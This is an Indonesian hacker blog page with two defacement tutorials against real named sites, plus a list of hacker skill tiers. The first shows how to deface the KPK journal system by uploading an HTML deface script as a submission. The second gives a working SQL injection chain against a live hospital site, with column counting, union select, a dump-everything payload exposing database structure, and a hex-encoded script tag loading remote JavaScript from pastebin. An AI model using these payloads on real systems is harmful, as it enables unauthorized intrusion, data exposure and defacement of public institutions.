Deface poc ojs(subdo kpk) - ACT

Welcome back mamank,kali ini we bagi deface poc ojs(open journal system) subdomain kpk.
Langsung in tutorial

Target:
https://jurnal.kpk.go.id/index.php/integritas/login

Daftar dulu woi

Pendaftaran limited,klo gk bisa daftar langsung login aja
User:
Pw:
Mau tau?cht me :v
Wa.me/+6283143494236

Klo udh login klik pengajuan baru/new submision

Kemudian section/bagian ganti articles and centang semua Submission Requirements/persyaratan pengajuan

Kemudian klik save and continue/simpan dan lanjukan
Next
Article component ganti dokument artikel utama,kemudian lu upload Script deface lu
note:gk berlaku buat Shell

Klo udh upload kemudian continue aja
Dan file lu dah ke upload

Cara manggil nya

https://jurnal.kpk.go.id/files/journals/1/articles/573/submission/573-1-1786-1-2-20200309.html

573 itu ganti dengan id lu cara cek id nya klik hasil upload lu nanti auto download

Kemudian 1786-1-2-20200309.html

Ganti dengan nama html lu

Hasil:

https://jurnal.kpk.go.id/files/journals/1/articles/577/submission/577-1-1790-1-2-20200310.html

Done

Sekian tq

Jenis dan tingkatan Hacker

1.Lammer

Mereka adalah orang tanpa pengalaman dan pengetahuan yang ingin menjadi peretas (wanna-be hacker). Mereka biasanya membaca, mendengar menonton film atau video tentang hacker dan ingin menjadi seperti mereka. Penggunaan komputer mereka hanyalah untuk main game, IRC, tukar-menukar perangkat lunak bajakan dan mencuri kartu kredit. Melakukan hacking menggunakan perangkat lunak trojan, nuke, dan DoS. Biasanya menyombongkan diri melalui IRC channel. Karena banyak kekurangan untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai tingkat developed kiddie atau script kiddie saja.


2.Script Kiddies

Seperti developed kiddie, Script Kiddie biasanya melakukan aktivitas di atas. Seperti juga Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal. Biasanya tidak lepas dari GUI. Hacking dilakukan menggunakan trojan untuk menakuti dan menyusahkan hidup pengguna Internet.


3.Developed Kiddies

Sebutan ini terutama karena umur kelompok ini masih muda (ABG) dan masih sekolah. Mereka membaca tentang metode hacking dan caranya di berbagai kesempatan. Mereka mencoba berbagai sistem sampai akhirnya berhasil dan memproklamasikan kemenangan ke peretas lainnya. Umumnya mereka masih menggunakan Grafic User Interface (GUI) dan baru belajar hal dasar dari UNIX, tanpa mampu menemukan lubang kelemahan baru di sistem operasi.


4.Semi Elite

Hacker ini biasanya lebih muda daripada Elite. Mereka juga mempunyai kemampuan dan pengetahuan luas tentang komputer. Mereka mengerti tentang sistem operasi (termasuk lubangnya (vulnerability)). Biasanya dilengkapi dengan sejumlah kecil program cukup untuk mengubah program eksploit. Banyak serangan yang dipublikasi dilakukan oleh hacker tingkat ini. Sialnya oleh para Elite mereka sering kali dikategorikan Lamer.


5.Elite

Juga dikenal sebagai 3l33t, 3l337, 31337, leet, 1337 atau kombinasi dari itu; merupakan ujung tombak industri keamanan jaringan. Mereka memahami sistem operasi sisi luar dalam, sanggup mengkonfigurasi dan menyambungkan jaringan secara global. Sanggup melakukan pemrograman setiap harinya. Sebuah anugerah yang sangat alami, mereka biasanya efisien & terampil, menggunakan pengetahuannya dengan tepat. Mereka seperti siluman yang dapat memasuki sistem tanpa terdeteksi, walaupun mereka tidak akan menghancurkan data-data yang ditemui. Karena mereka selalu mengikuti peraturan yang ada.

Deface Poc SQL with dios - ACT

saya Mr.X-Notfound akan membagikan cara deface SQL chall/dios

•Dork
inurl:/berita.php?id= site.go.id

Yg pertama cari dork boleh apapun karena saya punya live target jadi engga usah

Live target
http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1

Kemudian kasih tanda ' dibelakang syntax live target
Contoh :
http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1'

Jika web tersebut vuln kita akan menemukan error atau gambar yg hilang contoh seperti gambar di atas

Next tmbh kan +order+by+1--+- di belakang web target
Contoh:
http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1%27+order+by+1--+-

(%27 abaikan saja)

Cari sampai error

http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1%27+order+by+1--+-

http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1%27+order+by+2--+-

http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1%27+order+by+3--+-

Dan seterunya

Disini saya error di bagian kolom 10
http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1+order+by+10--+-

Nah lalu kita buat cara seperti ini
Order by ganti dengan union select
Contoh :
http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1%27+union+select+1,2,3,4,5,6,7,8,9,10--+-

Nah ada angka togel tuh, yaitu 2
Nah lalu kita dios deh
Contoh:
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)

Lalu kita pastekan di angka togel td

http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1%27+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),3,4,5,6,7,8,9,10--+-

Jadi gini deh,Keliatan kan DBnya
DB = data base
Lalu mari kita deface
Gua disini make dios deface gua

Klo lu blom ada bs lu pastein sc jso lu di sini
https://www.online-toolz.com/tools/text-hex-convertor.php

Nah klo udh lu msukin di angka togel itu
Contoh dios deface
0x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d2268747470733a2f2f706173746562696e2e636f6d2f7261772f48456b6461374475223e3c2f7363726970743e

Hasil

http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1%27+union+select+1,0x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d2268747470733a2f2f706173746562696e2e636f6d2f7261772f48456b6461374475223e3c2f7363726970743e,3,4,5,6,7,8,9,10--+-

Selesai deh
Sekian dr saya wassalamualaikum wr.wb